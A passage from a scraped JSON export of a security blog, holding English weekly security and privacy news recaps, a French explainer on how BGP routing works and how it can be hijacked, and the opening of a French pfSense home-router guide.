Shadows) Can We Stop Pretending SMS Is Secure Now? (Krebs on Security) Crédits # Image de couverture par mohamed Hassan sur Pixabay ","date":"2022-06-23","externalUrl":null,"permalink":"/fr/posts/2022/2fa-youre-doing-multifactor-authentication-wrong/","section":"Articles","summary":"Vous stockez vos codes 2FA avec vos mots de passe ? Vous ne faites pas de sauvegardes ? Vous faites mal ! Voyons comment utiliser la 2FA de manière sécurisée.","title":"2FA : Vous vous y prenez mal","type":"posts"},{"content":"Last week, ransomware operators got creative in hope of extorting more money from their victims, Amazon is being sued for snooping on users with Alexa-connected devices, a Russian intelligence officer was caught trying to infiltrate the International Criminal Court, 1.7 billion records were exposed by a misconfigured Elasticsearch cluster, and more. Let\u0026rsquo;s find out about everything that happened over the last week in security and privacy.\nLast week, I also wrote an article about BGP, the protocol that helps routing Internet traffic. Have a look if you\u0026rsquo;re curious to learn how it works.\nIf you regularly read this newsletter, you will notice that the format is a bit different than usual. I\u0026rsquo;ll be trying various things over the next weeks, and if you feel like it, I\u0026rsquo;m happy to hear some feedback (mail, Twitter) about what you want to see more (or less), if lists of links are good, or more summaries are better, etc.\nAPT, Governments and Espionnage # Gallium hackers backdoor finance, govt orgs using new PingPull malware (Bleeping Computer)\nGallium, a group believed to originate from China has been using a new malware, \u0026lsquo;PingPull\u0026rsquo;, against financial institutions in Europe, Africa, and Southeast Asia. The malware is designed to obtain reverse shells on compromised machines.\nAIVD disrupts activities of Russian intelligence officer targeting the International Criminal Court (General Intelligence and Security Service)\nThe AIVD, a Deutch intelligence agency caught a GRU Russian intelligence officer while he was trying to gain an internship at the International Criminal Court in The Hague.\nJulian Assange can be extradited, says UK home secretary (BBC)\nOn June 17th, the UK Home Secretary approved the extradition of Wikileak\u0026rsquo;s funder Julian Assange to the US. He has 14 days to appeal the decision.\nCryptocurrencies # Binance To Ban Litecoin Transactions With MimbleWimble Upgrade (Bitcoinist)\nLast month, Litecoin released its long-anticipated privacy update, Mimblewimble. Binance announced that it would not support the extension (i.e. it will only deal with non-privacy enabled transactions.) Earlier this month, 5 Korean exchanges (Upbit, Bithumb, Korbit, and Gopax) announced that they would delist Litecoin.\nCoinbase Lays Off Around 1,100 Employees (CoinDesk)\nCoinbase announced that it would lay off 18% of its workforce. The CEO justified the decision by arguing that the company \u0026ldquo;grew too quickly\u0026rdquo; and that it was needed to survive a potential upcoming crypto winter. The company had already rescinded new job offers last month. A good number of companies are also firing people (see more here.)\nWasabi Wallet 2.0 Feature List (Wasabi Blog)\nWasabi 2.0, a wallet software known for its ability to do coinjoin mixing was released. It has been in development since 2020.\nMore on Cryptocurrencies:\nTracking Threat Actor Usage of Cryptocurrencies with Chainalysis (Mandiant) Darknet and Cybercrime # CloudFlare says it stopped largest HTTPS DDoS attack on record last week (The Record)\nCloudflare said it stopped a 26 million requests per second HTTPS DDoS attack (the largest on record) that originated from a botnet of 5,067 (mostly cloud service providers hosted) devices.\n**Illinois Man Sentenced to 2 Years in Federal Prison for Operating Subscription-Based Computer Attack Platforms ** (US DoJ)\nA man was sentenced to 24 months in prison for running DownThem.org, a DDoS as a Service, and AmpNode.com, a bulletproof server hosting that had some available pre-configuration available to help with DDoS attacks.\nInterpol seizes $50 million, arrests 2000 social engineers (Bleeping Computer)\n\u0026lsquo;First Light 2022,\u0026rsquo; an international law enforcement action led by Interpol and involving law enforcement of 76 countries resulted in the seizure of USD 50 million and the arrest of about 2,000 people involved in social engineering schemes (romance scams, email deception, scamming fraud, \u0026hellip;)\nDeputy U.S. Marshal Charged with Unlawfully Obtaining Cell Phone Location Information (US DoJ)\nA Texas US Mashal was indicted for unlawfully using a law enforcement service to track individuals he had relations with by using their cellphone data (if you\u0026rsquo;re curious, I wrote an article a while ago explaining how it works.) He is also accused of trying to cover his tracks by making false statements and falsifying records. He is facing decades in prison.\n**Russian Botnet Disrupted in International Cyber Operation ** (US DoJ)\nThe US Department of Justice, in collaboration with German, the Netherland, and the UK law enforcement announced that they disrupted the operation of RSOCKS, a Russian botnet. ROCKS offers proxy services to its customers by using (allegedly) millions of compromised devices (IoT, phones, and computers.)\nMore on Darknet and Cybercrime\nDark Web Price Index 2022 (Privacy Affairs) Dark web awash with breached credentials, study finds (The Daily Swigg) Data Breaches # 700,000 Social Security Numbers Leaked in Attack on Major Arizona Hospital (Bitdefender)\nYuma, a major hospital in Arizona suffered a ransomware incident in late April. Malicious actors exfiltrated data of more than 700,000 patients including SSNs, health, and insurance data.\nComstar, LLC Provides Notice of Data Breach (PR Newswire)\nComstar, a US ambulance billing service issued a data breach notification on the 14th of June, and said that a security incident took place on April 21st and was detected on March 26th. The breached data of impacted individuals \u0026ldquo;may have included name, date of birth, medical assessment and medication administration, health insurance information, driver\u0026rsquo;s license, financial account information, and Social Security number.\u0026rdquo;\nMalaysian POS and Inventory Management Software Provider Leaked Almost 1 Million Customers\u0026rsquo; Data (SafetyDetectives)\nStoreHub, a Malaysia-based company providing point-of-sale software systems for food and beverage establishments as well as retail stores, was found to be exposing over one terabyte of data caused by an Elasticsearch server misconfiguration.\nThe data contained over 1.7 billions record with names, email, addresses, phone numbers, and orders of customers of businesses using StoreHub, as well as data from the businesses themselves.\nMiscellaneous # Microsoft explains how it is retiring Internet Explorer (GHacks)\nMicrosoft retired Internext Explorer on June 15th. As a first concrete step, Internet Explorer will be gradually redirecting to Microsoft Edge (\u0026ldquo;in the coming few months\u0026rdquo;) and will be properly disabled in a later second phase. Some devices will not be affected, such as those running Windows 7, 8.1, Server, 10 China, and IoT.\nFrench government launches private bug bounty program for identity authentication app (Port Swigger)\nThe French government started an invite-only bug bounty to test its \u0026lsquo;France Identité\u0026rsquo; application which allows French citizens to use online government services.\nAnd More:\nMicrosoft Defender for Android, Apple iOS and macOS, and Windows now available (GHacks) Password policies of most top websites fail to follow best practices (Princeton University) Privacy and Open-Source # Firefox rolls out Total Cookie Protection by default to all users worldwide (Mozilla Blog)\nStarting June 14th, Total Cookie Protection will be enabled for Firefox on all platforms. This update allows confining cookies to the site where they were created, to prevent companies from tracking users.\nSweeping Legislation Aims to Ban the Sale of Location Data (Vice)\nUS Senators introduced a bill aiming to ban the sale of Americans\u0026rsquo; location and health data. It says that “it shall be unlawful for a data broker to sell, resell, license, trade, transfer, share, or otherwise provide or make available [health and location] data, whether declared or inferred, of an individual.” The FTC would be tasked with developing rules to implement this ban with the help of USD 1 billion over the next decade.\nLawsuit claims Amazon using Alexa to target ads at customers (Axios)\nA lawsuit was filed against Amazon in Seattle and is seeking classification as a class-action. It claims that Amazon is snooping on users\u0026rsquo; voice data using smart speakers, and then uses it to target ads at them.\n**K-9 Mail app will become Thunderbird\u0026rsquo;s Android email client ** (GHacks)\nThunderbird\u0026rsquo;s developers, announced that K-9 Mail, a popular open-source Android application, has come under Thunderbird\u0026rsquo;s umbrella and will be rebranded as Thunderbird email.\nMore on Privacy\nFamiliar faces: Has facial recognition tech gone too far? (Sessions Blog) Stop Using the iOS Highlighter to Hide Personal Info in Your Photos (Life Hacker) Facial Recognition Is Out of Control in India (Vice) How the Federal Government Buys Our Cell Phone Location Data (EFF) Why strong security solutions are critical to privacy protection (Microsoft Security Blog) Facebook Says Apple is Too Powerful. They\u0026rsquo;re Right. (EFF) SimpleLogin passes an independent security audit (SimpleLogin) WFH - Watched from Home: Office 365 and workplace surveillance creep (Privacy International) Ransomware, Malware, and CVEs # Ransomware Group Debuts Searchable Victim Data (Krebs on Security)\nThe ALPHV/BlackCat ransomware group begin publishing on the Internet their victim\u0026rsquo;s data. While they used to do so on the DarkWeb, they are now creating dedicated websites where one can easily search the data.\nPSA: Critical Vulnerability Patched in Ninja Forms WordPress Plugin (Wordfence)\nA critical code injection vulnerability was found in Ninja Forms, a popular WordPress plugin with more than 1 million active installations. There is evidence that the vulnerability scored 9.8/10 is actively being exploited.\n","date":"2022-06-19","externalUrl":null,"permalink":"/blog/weekly-news-recap-17/","section":"News","summary":"Last week, ransomware operators got creative in hope of extorting more money from their victims, Amazon is being sued for snooping on users with Alexa-connected devices, a Russian intelligence officer was caught trying to infiltrate the International Criminal Court, 1.7 billion records were exposed by a misconfigured Elasticsearch cluster, and more. Let’s find out about everything that happened over the last week in security and privacy.\n","title":"Weekly News Recap 17","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSi vous suivez l\u0026rsquo;actualité sur Internet, vous avez peut-être vu qu\u0026rsquo;à la fin du mois de février, la FCC (Federal Communications Commission) a lancé une enquête sur le BGP. L\u0026rsquo;introduction du document de l\u0026rsquo;avis d\u0026rsquo;enquête mentionne que :\nLa Commission, en parallèle avec ses partenaires fédéraux, a exhorté le secteur des communications à se défendre contre les cybermenaces, tout en prenant des mesures pour renforcer la préparation de notre Nation et consolider la cybersécurité des services et infrastructures de communications vitaux, en particulier à la lumière de l\u0026rsquo;escalade des actions de la Russie en Ukraine. [\u0026hellip;] Nous sollicitons des commentaires sur les vulnérabilités menaçant la sécurité et l\u0026rsquo;intégrité du Border Gateway Protocol (BGP), qui est central pour Internet\nVous avez peut-être entendu parler du BGP comme de la chose utilisée pour router Internet, ou comme de la chose qui a fait tomber Facebook l\u0026rsquo;an dernier. Mais savez-vous vraiment ce que c\u0026rsquo;est, comment ça fonctionne, et quelles sont ses failles potentielles ? Découvrons-le.\nRoutage des paquets et BGP # Si l\u0026rsquo;on veut définir Internet, on pourrait dire qu\u0026rsquo;Internet est un ensemble de réseaux interconnectés. Selon Cisco, il y aura 5,3 milliards d\u0026rsquo;utilisateurs d\u0026rsquo;ici 2023, et selon siteefy, il existe actuellement 1,17 milliard de sites web. C\u0026rsquo;est formidable, mais avec ces chiffres, vous pouvez imaginer qu\u0026rsquo;une sorte de carte est nécessaire pour qu\u0026rsquo;un paquet aille de la machine A à la machine B. C\u0026rsquo;est à cela que sert le BGP.\nPour donner une définition plus technique, le BGP (Border Gateway Protocol - utilisant le port 179 sur TCP) permet de router les paquets entre les systèmes autonomes. Les systèmes autonomes utilisent le BGP pour annoncer les adresses IP qu\u0026rsquo;ils gèrent et à quels autres systèmes autonomes ils sont connectés. Avant d\u0026rsquo;entrer plus dans les détails, prenons un moment pour définir quelques termes.\nTerminologie # Système autonome (AS) # Un système autonome est un groupe d\u0026rsquo;un ou plusieurs préfixes IP (par exemple 8.8.0.0/24 qui représente toutes les adresses IP entre 8.8.0.1 et 8.8.0.254) ayant une politique de routage unique et clairement définie. Ils sont généralement gérés par une seule organisation, par exemple une entreprise (ex. Google, Amazon), une agence gouvernementale ou un FAI (ex. Verizon). Il est possible pour une organisation de gérer plusieurs systèmes autonomes.\nNuméro de système autonome (ASN) # Chaque système autonome est identifié par un numéro de système autonome (ASN), qui est attribué par un registre Internet régional (RIR). Il est utilisé par les opérateurs réseau pour échanger des informations de routage.\nIl est possible d\u0026rsquo;en savoir plus sur le propriétaire d\u0026rsquo;un ASN en utilisant la commande whois (comme vous le feriez pour un nom de domaine). Par exemple, whois AS15169 (la sortie est assez volumineuse, donc je ne la collerai pas ici).\nVous pouvez également savoir à quel AS et préfixe IP une adresse IP appartient. Par exemple, cymru.com fournit une API interrogeable via whois\n\u0026gt; whois -h whois.cymru.com -- \u0026#39;-v 8.8.8.8\u0026#39; AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name 15169 | 8.8.8.8 | 8.8.8.0/24 | US | arin | 1992-12-01 | GOOGLE, US Divers services sur Internet vous permettent également d\u0026rsquo;en savoir plus sur un ASN. Par exemple, AS15169 sur ipinfo.io, où vous pouvez voir toutes les plages d\u0026rsquo;IP attribuées à l\u0026rsquo;AS et comment il est connecté aux autres systèmes autonomes.\nRegistre Internet régional (RIR) et Internet Assigned Number Authority (IANA) # Il existe cinq registres Internet régionaux, et chacun est attribué à une zone géographique particulière. Par exemple, l\u0026rsquo;American Registry for Internet Numbers (ARIN) est chargé d\u0026rsquo;attribuer les ASN aux entités américaines. Les cinq RIR sont gérés par l\u0026rsquo;Internet Assigned Number Authority (IANA). Les RIR sont également chargés de l\u0026rsquo;attribution des plages d\u0026rsquo;IP.\nExemple de haut niveau # Toutes ces définitions sont bonnes, mais regardons quelque chose de concret, et disons que vous voulez envoyer une requête au DNS de Google 8.8.8.8. Pour votre ordinateur, ce sera assez simple : la seule connexion réseau qu\u0026rsquo;il a est votre routeur, donc il y envoie la requête. Ensuite, votre routeur n\u0026rsquo;a aussi qu\u0026rsquo;un seul choix : envoyer votre requête à votre FAI. Et ensuite ?\nLa figure suivante est une carte simplifiée d\u0026rsquo;Internet. En haut à droite se trouve votre FAI (disons AS0), et en bas à gauche Google (disons AS15169). Depuis votre ordinateur, votre requête est routée à travers différentes parties du réseau de votre FAI (éventuellement en utilisant le BGP interne, iBGP) et finit par atteindre le routeur de bordure de votre FAI. À partir de là, votre FAI décide (grâce au BGP et aux politiques internes) que le meilleur chemin est AS0 -\u0026gt; AS1 -\u0026gt; AS2 -\u0026gt; AS10 -\u0026gt; AS15169, et enverra donc votre requête à AS1, qui routera votre requête à travers son réseau interne et l\u0026rsquo;enverra à AS2, et ainsi de suite jusqu\u0026rsquo;à ce qu\u0026rsquo;elle atteigne le bon endroit.\nFigure 1 : Connexions décentralisées d\u0026rsquo;Internet Notez que par souci de simplification, la Figure 1 montre un seul routeur BGP pour chaque FAI, mais il y en aura en réalité plusieurs (en plus des routeurs BGP internes).\nComment les systèmes autonomes sont-ils connectés entre eux # Une chose que vous vous êtes peut-être demandée en regardant la Figure 1 précédente est comment les différents AS sont réellement connectés entre eux. Définissons quelques termes supplémentaires et voyons comment ils s\u0026rsquo;intègrent dans le tableau d\u0026rsquo;ensemble.\nSystèmes autonomes en amont et en aval # Si vous regardez la page ipinfo.io pour AS15169, vous remarquerez qu\u0026rsquo;il y a une liste d\u0026rsquo;ASN en amont et une liste d\u0026rsquo;ASN en aval. En résumé, les ASN en aval représentent les AS utilisant Google pour accéder au réseau plus large, et les ASN en amont représentent les AS utilisés par Google pour accéder au réseau plus large.\nTransit Internet (IP) et peering # Le transit IP est un service où un FAI (fournisseur en amont) vend le droit d\u0026rsquo;utiliser son réseau pour se connecter à l\u0026rsquo;Internet au sens large (c\u0026rsquo;est-à-dire utiliser les connexions BGP que le FAI a avec d\u0026rsquo;autres FAI).\nIl y a des cas où deux FAI peuvent se permettre mutuellement l\u0026rsquo;accès à leurs réseaux gratuitement. C\u0026rsquo;est ce qu\u0026rsquo;on appelle le peering. Cela se produit généralement quand les FAI ont des intérêts commerciaux à accéder gratuitement aux réseaux de l\u0026rsquo;autre.\nRéseaux Tier 1, 2 et 3 # Nous avons mentionné deux types de connexions entre FAI : le transit IP et le peering. La façon dont les FAI les utilisent dépend principalement de leur Tier.\nRéseaux Tier 1 Les FAI Tier 1 sont les plus grands. Ils sont généralement définis comme étant capables d\u0026rsquo;accéder à tous les autres réseaux sur Internet sans avoir à payer pour le transit Internet ou le peering.\nQuelques exemples de FAI Tier 1 sont AT\u0026amp;T, NTT et Orange.\nRéseaux Tier 2 Les FAI Tier 2 font du peering avec d\u0026rsquo;autres réseaux (principalement Tier 2), mais achètent également du transit IP auprès de fournisseurs Tier 1 pour accéder à l\u0026rsquo;ensemble d\u0026rsquo;Internet.\nLes FAI Tier 2 ont généralement une portée nationale ou régionale, et seuls quelques-uns sont capables de servir des clients sur plusieurs continents grâce à leur propre infrastructure.\nQuelques exemples de FAI Tier 2 sont Korea Telecom, British Telecom et Comcast.\nRéseaux Tier 3 Les fournisseurs de services Tier 3 sont généralement petits et achètent uniquement du transit IP auprès de réseaux Tier 2 et (parfois) Tier 1.\nPoint d\u0026rsquo;échange Internet (IXP) et interconnexion réseau privée (PNI) # Un IXP est un emplacement physique où les entreprises d\u0026rsquo;infrastructure Internet (par exemple les FAI et les CDN) se connectent pour échanger du trafic. C\u0026rsquo;est essentiellement un centre de données contenant des commutateurs réseau, maintenu (financé) par les différents participants.\nL\u0026rsquo;avantage pour les participants est qu\u0026rsquo;ils peuvent accéder aux réseaux les uns des autres sans avoir à payer de plus gros fournisseurs pour le peering. Les IXP aident également à améliorer la latence des requêtes échangées entre les participants. Notez que les participants ne partagent pas leurs connexions en amont via les IXP.\nVous pouvez voir quelques exemples d\u0026rsquo;IXP sur ce site web.\nNotez que les IXP impliquent généralement plus de deux participants. Si deux FAI estiment qu\u0026rsquo;une connexion mutuelle est suffisamment importante, ils créeront une interconnexion réseau privée (PNI), qui est une connexion fibre directe entre les deux.\nUn exemple concret # Maintenant que nous avons défini tous les acteurs utilisant le BGP, regardons à nouveau un exemple, mais cette fois avec un niveau de détail plus profond (notez qu\u0026rsquo;il y a beaucoup à dire, donc nous essaierons de garder les choses simples et de ne pas entrer dans chaque aspect).\nDans la Figure 2 suivante, nous avons :\nAS1 est un FAI Tier 2, il obtient une connexion en amont vers AS2, un FAI Tier 1 AS2 a une connexion en aval vers AS1 et AS4 AS3, AS4 et AS5 sont des FAI Tier 2 AS3 et AS5 partagent une connexion via un IXP AS1 et AS3 échangent beaucoup de trafic, ils ont donc un peering Idem pour AS4 et AS5 Figure 2 : Exemple de réseau BGP Disons que nous sommes AS1, un nouveau FAI qui vient d\u0026rsquo;être mis en ligne. Nous devons d\u0026rsquo;abord configurer nos voisins. Comme nous avons des accords avec AS3 et AS2, nous les ajoutons à notre configuration de voisins BGP. Notre table ressemblerait alors à ce qui suit (en réalité, elle serait plus complexe et contiendrait des statistiques, un statut, \u0026hellip;) :\nVoisin AS 1.5.0.1 3 1.2.0.1 2 À partir de là, nous recevrons des informations BGP, et notre table BGP sera remplie avec les éléments suivants (encore une fois, version simplifiée) :\nRéseau Prochain saut Chemin 1.1.0.1 0.0.0.0 i 1.5.0.0/16 1.5.0.1 AS3 1.4.0.0/16 1.5.0.1 AS3, AS5 1.3.0.0/16 1.5.0.1 AS3, AS5, AS4 1.2.0.0/16 1.5.0.1 AS3, AS5, AS4, AS2 1.2.0.0/16 1.2.0.1 AS2 1.3.0.0/16 1.2.0.1 AS2, AS4 1.4.0.0/16 1.2.0.1 AS2, AS4, AS5 Notez que les routes peuvent également être définies manuellement au lieu de s\u0026rsquo;appuyer sur les messages des voisins. Les réseaux n\u0026rsquo;étant pas quelque chose de figé, des mises à jour seront envoyées via BGP lorsque des changements sont effectués. Par exemple, s\u0026rsquo;il devenait non pertinent pour AS4 et AS5 d\u0026rsquo;avoir un accord de peering, et qu\u0026rsquo;ils cessaient d\u0026rsquo;avoir une connexion directe, notre table locale serait mise à jour comme suit.\nRéseau Prochain saut Chemin 1.1.0.1 0.0.0.0 i 1.5.0.0/16 1.5.0.1 AS3 1.4.0.0/16 1.5.0.1 AS3, AS5 1.2.0.0/16 1.2.0.1 AS2 1.3.0.0/16 1.2.0.1 AS2, AS4 Revenons à notre table BGP initiale, disons que nous voulons envoyer un paquet à AS5. Nous avons deux options :\nPrendre la route AS3 -\u0026gt; AS5 Prendre la route AS2 -\u0026gt; AS4 -\u0026gt; AS5 Puisque nous avons plusieurs options, le routeur examinera la configuration BGP pour choisir quelle route utiliser. Les politiques BGP permettent de baser les décisions de routage sur plusieurs éléments tels que :\nLa longueur du chemin La préférence locale L\u0026rsquo;ancienneté de la route Si le paquet peut être routé via iBGP plutôt qu\u0026rsquo;eBGP \u0026hellip; (voir les références de l\u0026rsquo;article pour plus de détails) Dans notre cas, puisque nous payons pour le trafic envoyé à AS2, nous pourrions avoir une préférence locale indiquant au routeur de faire passer les paquets par AS3 en priorité, car nous avons un accord de peering gratuit.\nQu\u0026rsquo;est-ce qui peut mal tourner ? # Le BGP est un protocole assez ancien (esquissé en 1989) et, comme la plupart des anciens protocoles (je vous regarde ARP, DNS et bien d\u0026rsquo;autres), il n\u0026rsquo;a pas été conçu avec la sécurité à l\u0026rsquo;esprit.\nLe risque le plus significatif avec le BGP est l\u0026rsquo;attaque de détournement BGP (BGP hijack). Elle consiste à faire envoyer par un AS de fausses informations de routage. Par exemple, revenons à la Figure 2. Nous avons une relation avec AS2 et AS3, nous avons donc choisi de leur faire confiance pour ne pas agir de manière malveillante, mais nous n\u0026rsquo;avons pas de contrôle sur leurs voisins, les voisins de leurs voisins, et ainsi de suite\u0026hellip; Il est tout à fait possible qu\u0026rsquo;à un moment donné, AS5 devienne malveillant et annonce qu\u0026rsquo;il possède le réseau 1.3.0.0/24 (qui appartient en réalité à AS4). Comme le BGP est basé sur la confiance, nos routes BGP seraient compromises, et certaines de nos communications pourraient finir entre de mauvaises mains (notez que dans cet exemple, AS5 devient malveillant, mais cela pourrait tout aussi bien être une erreur humaine).\nIl existe en fait plusieurs exemples d\u0026rsquo;attaques de détournement BGP ayant été exécutées. En 2018, un FAI russe a détourné des préfixes IP appartenant aux serveurs DNS d\u0026rsquo;Amazon et a redirigé les utilisateurs d\u0026rsquo;un portefeuille de cryptomonnaies vers un site web malveillant. Les pirates ont volé l\u0026rsquo;équivalent d\u0026rsquo;environ 152 000 USD en cryptomonnaies (référence)\nUn autre problème récurrent est la fuite de routes. Cela se produit essentiellement lorsqu\u0026rsquo;une route se retrouve (non intentionnellement) diffusée au-delà de sa portée prévue. Par exemple, en 2008, Pakistan Telecom a tenté de censurer YouTube en mettant les adresses IP du service en route nulle. Les routes ont ensuite été envoyées par erreur au fournisseur en amont de Pakistan Telecom, PCCW, et de là, se sont propagées à travers Internet.\nCorriger le BGP # La tentative la plus récente pour corriger le BGP est le RPKI (Resource Public Key Infrastructure), mais il n\u0026rsquo;est pas encore largement déployé. Vous pouvez en lire plus ici, ainsi que voir ses progrès d\u0026rsquo;adoption. En résumé, il fonctionne de la manière suivante :\nLes propriétaires de préfixes créent une ROA (Route Origin Authorization) qui permet d\u0026rsquo;associer un AS à un préfixe IP Les ROA sont signées par l\u0026rsquo;autorité de certification du registre Internet régional approprié (Trust Anchor) pour attester que l\u0026rsquo;association est correcte Les systèmes autonomes peuvent vérifier que l\u0026rsquo;association AS/préfixe IP qu\u0026rsquo;ils ont dans leurs routes est correcte en récupérant les informations et en vérifiant les signatures (par exemple en utilisant un validateur) Sources et ressources supplémentaires # StackPath: What is an Autonomous System Number (ASN) IANA: Number Resources ARIN: Autonomous System Numbers Wikipedia: Autonomous system (Internet) miloserdov: How to find out the Autonomous system on the IP and how to find out all the Autonomous System IPs Juniper Networks: BGP Overview CloudFlare: What is an Internet exchange point? | How do IXPs work? Cisco: BGP Techniques for Internet Service Providers Noction: IP Transit and the Tiers of Transit Providers Wikipedia: Tier 1 network Wikipedia: Tier 2 network Euro IX: Internet Exchange Points, 2018-2019 Report MTIN Consulting: Transit, peer, downstream..what do they all mean? Global Internet Exchange Points / BGP Peering Points / IXP NSRC: BGP For All Network Urge: BGP Messages N-Study: BGP Basic Configuration and Verification Commands Network Urge: BGP Best Path Selection Criteria Juniper: Understanding BGP Path Selection Loyola University of Chicago: Border Gateway Protocol (BGP) BGP.us: Overview of the BGP (Border Gateway Protocol) Network World: BGP: What is border gateway protocol, and how does it work? Cloudflare: Why Google Went Offline Today and a Bit about How the Internet Works Catchpoint: BGP Route Leak Incident Review Thousand Eyes: BGP Route Leak Thousand Eyes: BGP Route Hijacking IETF: BGPsec Protocol Specification Internet Society: BGPSec - A reality now phoenixNAP: RPKI Explained - Secure BGP Routing ARIN: What is Hosted RPKI? MANRS: What is route origin validation? RIPE: Resource Public Key Infrastructure (RPKI) Crédits images # Photo de couverture par Lars Kienle sur Unsplash ","date":"2022-06-14","externalUrl":null,"permalink":"/fr/posts/2022/bgp-what-is-it-and-how-can-it-be-used-to-hijack-internet-traffic/","section":"Articles","summary":"Le Border Gateway Protocol (BGP) est ce qui permet au trafic Internet d’être correctement routé. Savez-vous comment il fonctionne ? Découvrons-le.","title":"BGP : Qu'est-ce que c'est et comment ça fonctionne","type":"posts"},{"content":"After a few months of absence, the weekly new recap is back, and will now be published every Monday morning. As usual, it will go through the security, privacy, and darknet news of the past week.\nI also published a new article on the blog last week, going through how you can configure a pfSense device to ensure better security and privacy in your home network. You can read more here.\nAPT # **Russia warns of a “military clash” if it\u0026rsquo;s hit by US cyberattacks ** (The Record)\nShortly after the US Chief of Cyber Command announced that the US \u0026ldquo;conducted a series of operations to support Ukraine,\u0026rdquo; Russia\u0026rsquo;s foreign ministry warned that \u0026ldquo;The militarization of the information space by the West [\u0026hellip;] has greatly increased the threat of a direct military clash.\u0026rdquo;\nCryptocurrencies # **How crypto giant Binance became a hub for hackers, fraudsters and drug traffickers ** (Reuters)\nA recent Reuters investigation claims that Binance was used by criminals linked to Lazarus, Hydra, and others to launder more than USD 2.35 billion between 2017 and 2021. Binance claims that these numbers are not accurate.\nDarknet # AlphaBay Is Taking Over the Dark Web—Again (Wired)\nWired reports that Alphabay is or is close to becoming the number 1 dark market again. As of now, it is said to have more than 1,300 vendors listing a total of 30,000 products. While the numbers are allegedly growing fast, this is still a fraction of the 350,000 listings on the original Alphabay that closed in 2017.\nGeneral Security # Apple\u0026rsquo;s Rapid Security Response will push faster updates that install on Macs without a reboot (The Verge)\nIf you have an Apple device, you probably hate updates because the installation takes ages, and you can\u0026rsquo;t use it meanwhile. It seems that most (?) updates will not require that anymore, and will be installable like a standard software update.\nDOJ, FBI shut down marketplace for stolen Social Security numbers (The Record)\nSSNOB, a marketplace selling American social security numbers was shut down by the FBI, IRS, and Justice Department, in cooperation with Cyprus and Latvia law enforcement agencies. The website is said to have generated more than USD 19M in sales revenues, and might have had some link with Jocker\u0026rsquo;s Stash, a carding website that was closed down in January 2021.\nMIT researchers uncover \u0026lsquo;unpatchable\u0026rsquo; flaw in Apple M1 chips (Tech Crunch)\nResearchers found a vulnerability in Apple\u0026rsquo;s M1 processor chip that they named PACMAN. It can be used to corrupt the content of a memory location, and gain control of the system. The flaw works by guessing the pointer authentication code used by ARM pointer authentication, a last-line-of-defence mechanism used to protect memory pointers with cryptographic hashes. The flaw is not patchable but may not be an immediate cause of concern because it is not exploitable alone. Full paper here.\nPrivacy # Firefox 102: Query Parameter Stripping improves privacy (GHacks)\nFirefox will ship a new feature called \u0026ldquo;Query Parameter Stripping\u0026rdquo; in its next version (which will be released on the 28th of this month). It will allow removing tracking parameters from URLs.\n**Bitwarden introduces integrations with email alias services ** (Reclaim the Net)\nBitwarden, a password manager, now integrates AnonAddy, Firefox Relay, and SimpleLogin to allow generating unique email addresses when creating a new entry.\n**Google Photos face grouping has a new retention policy, thanks to $100 million lawsuit ** (9To5Google)\nGoogle change the retention policy of facial recognition models in Google Photos after settling a USD 100M class-action lawsuit in Illinois. It now says that all the face models will be deleted from Google Photos if you delete pictures used to generate them, or if your account is inactive for more than two years.\nDer Spiegel Says Telegram Gave User Data to German Police in Fight against Terrorism, Child Abuse (BitDefender)\nDespite claiming that \u0026ldquo;to this day, [Telegram] has disclosed 0 bytes of user data to third parties, including governments,\u0026rdquo; the company reportedly released data of users accused of child abuse and terrorism to the German Federal Criminal Police office. A German investigator reported that getting data from Telegram for other kinds of offences is \u0026ldquo;still difficult.\u0026rdquo;\nMakers of ad blockers and browser privacy extensions fear the end is near (The Register)\nAs of January 2023, Google Chrome will stop supporting extensions using Manifest v2. Google claims that forcing extensions to use Manifest v3 (first proposed by the company in 2018) is a move to protect users and their privacy, despite depreciating APIs used by developers of ad-blocking and privacy apps, sparking concerns.\n**Bluetooth signals can be used to identify and track smartphones ** (UC San Diego)\nA team of engineers at the University of California San Diego found that it might be possible to track individuals using their mobile phone Bluetooth fingerprint computed by using the defects of the hardware. According to an experiment with 647 devices, 47% of them had a unique fingerprint. Full paper here.\nInteresting Reads # Anatomy of a DDoS amplification attack (Microsoft Security) Use of Cryptocurrency in Ransomware Attacks, Available Data, and National Security Concerns (US Senate Committee) UNREDACTED Magazine Issue 002 Hacking a powered-off iPhone: vulnerabilities never sleep (Kaspersky) Geofence Warrants and Reverse Keyword Warrants are So Invasive, Even Big Tech Wants to Ban Them (EFF) Router security in 2021 (SecureList) The Surreal Case of a C.I.A. Hacker\u0026rsquo;s Revenge (The New Yorker) ","date":"2022-06-12","externalUrl":null,"permalink":"/blog/weekly-news-recap-16/","section":"News","summary":"After a few months of absence, the weekly new recap is back, and will now be published every Monday morning. As usual, it will go through the security, privacy, and darknet news of the past week.\n","title":"Weekly News Recap 16","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nIl y a quelques semaines, j\u0026rsquo;ai publié un article expliquant comment transformer un Raspberry Pi inutilisé en routeur WiFi faisant passer tout votre trafic par un VPN avec OpenWRT. Dans l\u0026rsquo;article d\u0026rsquo;aujourd\u0026rsquo;hui, nous passerons au niveau supérieur et verrons comment gérer votre réseau domestique si vous souhaitez plus de contrôle, de fonctionnalités et de performances.\nPour cela, nous utiliserons pfSense, une distribution firewall/routeur basée sur FreeBSD maintenue par NetGate, et effectuerons les opérations suivantes :\nCréer une configuration de base fonctionnelle de pfSense Rediriger votre trafic (ou du moins une partie) à travers un VPN Configurer un résolveur DNS local Installer pfBlockerNG, l\u0026rsquo;équivalent de PiHole pour améliorer votre vie privée (les publicités et les trackers seront bloqués au niveau DNS) Mettre en place une surveillance de base avec Snort Notez que j\u0026rsquo;utilise un Protectli FW4B (4 Go de RAM, 32 Go de disque dur - jusqu\u0026rsquo;ici, cela semble être plus que suffisant) et un routeur WiFi basique fonctionnant en mode point d\u0026rsquo;accès. La configuration pourrait être améliorée en utilisant un point d\u0026rsquo;accès supportant les VLANs (particulièrement si vous souhaitez isoler des appareils tels que les appareils Amazon). J\u0026rsquo;utilise la dernière version de pfSense (2.6.0) au moment de la rédaction de cet article.\nAh, et juste un mot sur les VPN, car on entend beaucoup de choses à leur sujet ces temps-ci\u0026hellip; Les 